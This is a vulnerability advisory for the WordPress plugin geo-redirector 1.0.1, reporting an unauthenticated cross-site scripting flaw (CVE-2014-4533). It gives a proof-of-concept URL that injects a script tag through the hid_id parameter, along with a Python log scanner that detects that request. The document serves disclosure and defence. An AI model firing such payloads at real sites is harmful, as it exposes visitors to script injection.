wp-plugin : geo-redirector – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : geo-redirector

 

Affected Version : 1.0.1 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/georedirector/ajax_functions.php?hid_id=hid_id%27%3E%3Cscript%3Ealert%282%29%3C/script%3E
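
A detection check for the request pattern in the PoC above, as an added example that is not part of the original advisory or the plugin's code. It assumes combined-format web server access logs and that a legitimate hid_id is a plain identifier; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate hid_id only contains letters, digits, "_" and "-".
SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9_-]*$")
TARGET_SCRIPT = "ajax_functions.php"  # script named in the PoC
PARAM = "hid_id"                      # parameter named in the PoC

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Apr/2014:10:00:01 +0000] "GET /wordpress/wp-content/'
    'wp-plugs/georedirector/ajax_functions.php?hid_id=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Apr/2014:10:00:07 +0000] "GET /wordpress/wp-content/'
    'wp-plugs/georedirector/ajax_functions.php?hid_id=hid_id%27%3E%3Cscript'
    '%3Ealert%282%29%3C/script%3E HTTP/1.1" 200 540',
    '198.51.100.7 - - [25/Apr/2014:10:01:00 +0000] "GET /wordpress/index.php'
    '?hid_id=%3Cb%3E HTTP/1.1" 200 900',
]

def suspicious_hid_id(log_line):
    """Return the decoded hid_id value if the line requests the plugin script
    with a value outside the safe character set, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("/" + TARGET_SCRIPT):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        # parse_qs decoded once; decode again to expose double encoding.
        decoded = unquote(value)
        if not SAFE_VALUE_RE.match(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        value = suspicious_hid_id(line)
        if value is not None:
            hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious {PARAM} value: {value!r}")
```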

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4533

 
Plugin Description :
 
This WordPress plugin allows you to redirect your URLs according to the visitor's geographical location. You can also manage redirecting the visitor inside or outside a given radius. This plugin was developed by AnushkaKR.
